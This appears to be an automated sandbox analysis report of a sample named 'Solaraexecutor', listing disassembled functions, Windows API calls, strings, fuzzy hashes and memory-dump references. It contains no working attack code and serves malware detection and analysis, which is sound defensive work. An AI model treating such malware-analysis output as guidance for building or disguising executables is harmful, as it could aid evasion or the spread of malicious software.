Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 3A111F71A92B08ABE560B7B1CC07FCB7BACDF04B00F845C15B29D66092DB65B5059B70

Function 00D3E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D3E669,00D3E5CC,00D3E86D), ref: 00D3E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D3E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D3E630

Strings

ReleaseSRWLockExclusive, xrefs: 00D3E625
KERNEL32.DLL, xrefs: 00D3E600
AcquireSRWLockExclusive, xrefs: 00D3E615

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 2bdbe9f09638865d5bca6ebf4931ba3059d206db5304bd77d573ec5546b7f262
Instruction ID: 8786be8217f6d52801bb9ee0bac9c184ab2fcabadfb74f82b446b517de5172d0
Opcode Fuzzy Hash: 2bdbe9f09638865d5bca6ebf4931ba3059d206db5304bd77d573ec5546b7f262
Instruction Fuzzy Hash: 5EF0F6357903225F0F224F6A5C96566A3DC6A25792B080C39ED41D33D0FB10CC5D9BF0

Function 00D3146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00D314C2

Part of subcall function 00D2B146: GetVersionExW.KERNEL32(?), ref: 00D2B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D314E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D31500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D31513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00D31523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00D31533

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 0b09ed5cc87aa35541f12566f941acac8b13eadfb6b9705aa1ca34a18abd4a2b
Instruction ID: fca72ad60bfec42c6007d17b0e918dce45a92f4393785f142a1d8ffa88bbe58a
Opcode Fuzzy Hash: 0b09ed5cc87aa35541f12566f941acac8b13eadfb6b9705aa1ca34a18abd4a2b
Instruction Fuzzy Hash: FC31F879108306ABC700DFA8C88499BB7F8FF98755F004A1EF995C3210E730D509CBA6

Function 00D42AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D42AF1,00D402FC,00D3FA34), ref: 00D42B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D42B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D42B2F
SetLastError.KERNEL32(00000000,00D42AF1,00D402FC,00D3FA34), ref: 00D42B81

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2dbbcdea393f1e2c951d219f405f8e8ff7eb6ca30fb89e8cfb77426dac9a109e
Instruction ID: ee7532488e5d0feee493a72d0cba7d48ec56eee46eb9b653ee55851859a4e84a
Opcode Fuzzy Hash: 2dbbcdea393f1e2c951d219f405f8e8ff7eb6ca30fb89e8cfb77426dac9a109e
Instruction Fuzzy Hash: 3A01F7325097116FAA182F787C8593B2F59EF457B67E40739F910952E4EF114E049174

Function 00D497E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00D61030,00D44674,00D61030,?,?,00D43F73,00000050,?,00D61030,00000200), ref: 00D497E9
_free.LIBCMT ref: 00D4981C
_free.LIBCMT ref: 00D49844
SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D49851
SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D4985D
_abort.LIBCMT ref: 00D49863

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 3174dbcf1ff90bb22199b7573e99619e6e1ba0e64f527e5ca703553cddbc3e2f
Instruction ID: 46486551ab03201a73f455097a196a68d117ca50cd85f2fcbc5db995a3d56c4c
Opcode Fuzzy Hash: 3174dbcf1ff90bb22199b7573e99619e6e1ba0e64f527e5ca703553cddbc3e2f
Instruction Fuzzy Hash: BFF0A4355407016BC652372E6C2AB2FAA65CFE27B2F290134F924D22D2EF21C9055575

Function 00D3DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D3DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3DC72
TranslateMessage.USER32(?), ref: 00D3DC7C
DispatchMessageW.USER32(?), ref: 00D3DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D3DC91

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 85b7ccb13c6c0215cf215f52c03598306595b306b60bb29cb78cc12f4df9e80b
Instruction ID: d33bf0cdefed8d4191141aae88312888a959e3b9f6c67f0a23127b1b1182c641
Opcode Fuzzy Hash: 85b7ccb13c6c0215cf215f52c03598306595b306b60bb29cb78cc12f4df9e80b
Instruction Fuzzy Hash: 67F03C72A11319BBCB206FA5EC4CDCB7F6DEF46B91F044111B50AD2150D6748646CBB0

Function 00D2C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00D305DA: _wcslen.LIBCMT ref: 00D305E0

Part of subcall function 00D2B92D: _wcsrchr.LIBVCRUNTIME ref: 00D2B944

_wcslen.LIBCMT ref: 00D2C197
_wcslen.LIBCMT ref: 00D2C1DF

Strings

.rar, xrefs: 00D2C0E1, 00D2C134
.sfx, xrefs: 00D2C11A
.exe, xrefs: 00D2C10B

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: f7d98e11e220b0463a2283b2dea84cbbc746728ebefb92cc3a3d3c5d59285d6e
Instruction ID: 226b13813437e9755caff838ed3b98dd3385da9f72d13e761ae76d94ff9a028b
Opcode Fuzzy Hash: f7d98e11e220b0463a2283b2dea84cbbc746728ebefb92cc3a3d3c5d59285d6e
Instruction Fuzzy Hash: 70417B2652037196C732AF34A813A7F73A4EF6175CF28650EF9C26B081EB518D95C3B5

Function 00D3CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00D3CE9D

Part of subcall function 00D2B690: _wcslen.LIBCMT ref: 00D2B696

_swprintf.LIBCMT ref: 00D3CED1

Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5

SetDlgItemTextW.USER32(?,00000066,00D6946A), ref: 00D3CEF1
EndDialog.USER32(?,00000001), ref: 00D3CFFE

Strings

%s%s%u, xrefs: 00D3CEC6

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 1c367ab3a8a53e242198c395b83814a00d4302d6903e797d7a9e441ae1f42f04
Instruction ID: 664ca47768248bb63c7ca7c524697d0974c69a6ae9e07c958c91c47985984695
Opcode Fuzzy Hash: 1c367ab3a8a53e242198c395b83814a00d4302d6903e797d7a9e441ae1f42f04
Instruction Fuzzy Hash: 8E419EB1900218AADF259BA0DC45EEE77BDEF05341F4480A6FA09E7141EEB19A84CF71

Function 00D2BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D2BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00D2A275,?,?,00000800,?,00D2A23A,?,00D2755C), ref: 00D2BBC5
_wcslen.LIBCMT ref: 00D2BC3B

Strings

UNC, xrefs: 00D2BBA7
\\?\, xrefs: 00D2BB52, 00D2BB99, 00D2BBF7, 00D2BC4E

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: abd697e57395257785f180b47875b095231e7e6217a56a7932560a26d8380e9b
Instruction ID: 706cb34ac657558e9cee9496e1f883b5928f0eb09007a1cdb214863ec79feaed
Opcode Fuzzy Hash: abd697e57395257785f180b47875b095231e7e6217a56a7932560a26d8380e9b
Instruction Fuzzy Hash: A541B771400625AACF21AF30EC01EEE7769EF513A9F188467F855A3151DBF0DE94DAB0

Function 00D3B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00D3B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00D3B712
DeleteObject.GDI32(00000000), ref: 00D3B744
DeleteObject.GDI32(00000000), ref: 00D3B767

Part of subcall function 00D3A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D3B73D,00000066), ref: 00D3A6D5
Part of subcall function 00D3A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A6EC
Part of subcall function 00D3A6C2: LoadResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A703
Part of subcall function 00D3A6C2: LockResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A712
Part of subcall function 00D3A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D3B73D,00000066), ref: 00D3A72D
Part of subcall function 00D3A6C2: GlobalLock.KERNEL32(00000000), ref: 00D3A73E
Part of subcall function 00D3A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D3A762
Part of subcall function 00D3A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D3A7A7
Part of subcall function 00D3A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00D3A7C6
Part of subcall function 00D3A6C2: GlobalFree.KERNEL32(00000000), ref: 00D3A7CD

Strings

], xrefs: 00D3B71A

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: c33300ac271f5b24636a74c2b9188c3fb1697202ba02ef878e69dab3978d9133
Instruction ID: e594b69acd02c53c3bb2083efcaa570231e8822409deff974c62eeb8eadb960f
Opcode Fuzzy Hash: c33300ac271f5b24636a74c2b9188c3fb1697202ba02ef878e69dab3978d9133
Instruction Fuzzy Hash: 2901C07660071167C712BB789C0AABF7AB9EFC0B62F090012FA40B7291DF618D0542B2

Function 00D3D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370

EndDialog.USER32(?,00000001), ref: 00D3D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D3D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00D3D675
SetDlgItemTextW.USER32(?,00000068), ref: 00D3D684

Strings

RENAMEDLG, xrefs: 00D3D618

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 80b38280de2ed004f68fccefe4014dec5ac02ab06ff4b4ff7857845febf54fc7
Instruction ID: 87e2183bdeba801bc5d40f9e4efef4c6d062cb5e6fcd2cb1a753701fb4c714d1
Opcode Fuzzy Hash: 80b38280de2ed004f68fccefe4014dec5ac02ab06ff4b4ff7857845febf54fc7
Instruction Fuzzy Hash: 3E01F533244318BAD2214F64BD0AF56776EEB9AB01F110010F649E61D4C6A299048F75

Function 00D47E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D47E24,00000000,?,00D47DC4,00000000,00D5C300,0000000C,00D47F1B,00000000,00000002), ref: 00D47E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D47EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00D47E24,00000000,?,00D47DC4,00000000,00D5C300,0000000C,00D47F1B,00000000,00000002), ref: 00D47EC9

Strings

CorExitProcess, xrefs: 00D47E9E
mscoree.dll, xrefs: 00D47E8C

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 907f0918a1b0cfafd221b7c75d1762ef01ffe07858e3b11a0f302d96cb350570
Instruction ID: c268ba78cd9a40761617620725ac7ff4b3cd46aea4ae625b8a1c5cffe01c07f9
Opcode Fuzzy Hash: 907f0918a1b0cfafd221b7c75d1762ef01ffe07858e3b11a0f302d96cb350570
Instruction Fuzzy Hash: 34F04F31A04309BFDB119FA4DC09B9EBFB4EB44752F0441A9FC05E22A0DB709E44CAB4

Function 00D2F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00D3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D30836
Part of subcall function 00D3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D2F2D8,Crypt32.dll,00000000,00D2F35C,?,?,00D2F33E,?,?,?), ref: 00D30858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D2F2E4
GetProcAddress.KERNEL32(00D681C8,CryptUnprotectMemory), ref: 00D2F2F4

Strings

CryptUnprotectMemory, xrefs: 00D2F2EA
CryptProtectMemory, xrefs: 00D2F2DE
Crypt32.dll, xrefs: 00D2F2CE

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: d2afb927cc25e3c205a146c9f0852fa7646f50f9a40cbbdce81bd5a5ec42de15
Instruction ID: 13e11699a91eef3ffe1a682a40347686ee6a0bbcfb9e83df68b147fd4060bd7c
Opcode Fuzzy Hash: d2afb927cc25e3c205a146c9f0852fa7646f50f9a40cbbdce81bd5a5ec42de15
Instruction Fuzzy Hash: EBE086719107519EDB219F38A84DB027EE4AF14745F14882DFCDAD3680DAB4D5488B70

Function 00D42BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00D42CA1
___AdjustPointer.LIBCMT ref: 00D42CC4
_abort.LIBCMT ref: 00D42D12
___AdjustPointer.LIBCMT ref: 00D42D60

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 48feac2b3e50835a18178788e0b7cc0db26357a5980e00be422cdb7df290552b
Instruction ID: be3a33bc10b82719cc4ea3ff73ca40f4de0b74e967841e632fa4084ee5ee335c
Opcode Fuzzy Hash: 48feac2b3e50835a18178788e0b7cc0db26357a5980e00be422cdb7df290552b
Instruction Fuzzy Hash: 7351D472A00212AFDB298F14D885BBAB7A4FF54311F68452DFD41976A1D731ED80D7B0

Function 00D4BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00D4BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4BF5C

Part of subcall function 00D48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D4BF82
_free.LIBCMT ref: 00D4BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4BFA4

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: e1e73b07f124c179ff652dbeb0b278fb4bb6b0a5b6e76a8e1ee10728db618515
Instruction ID: 3fd3639ea5b9b286d166d810a415338f2c655b987eedc428329aeae8c853ebc0
Opcode Fuzzy Hash: e1e73b07f124c179ff652dbeb0b278fb4bb6b0a5b6e76a8e1ee10728db618515
Instruction Fuzzy Hash: ED01A2726057157F27211ABA5C8DC7F6A6DEED6BF1318012AFD08D3241EF62CD0699B0

Function 00D49869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00D491AD,00D4B188,?,00D49813,00000001,00000364,?,00D43F73,00000050,?,00D61030,00000200), ref: 00D4986E
_free.LIBCMT ref: 00D498A3
_free.LIBCMT ref: 00D498CA
SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D498D7
SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D498E0

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
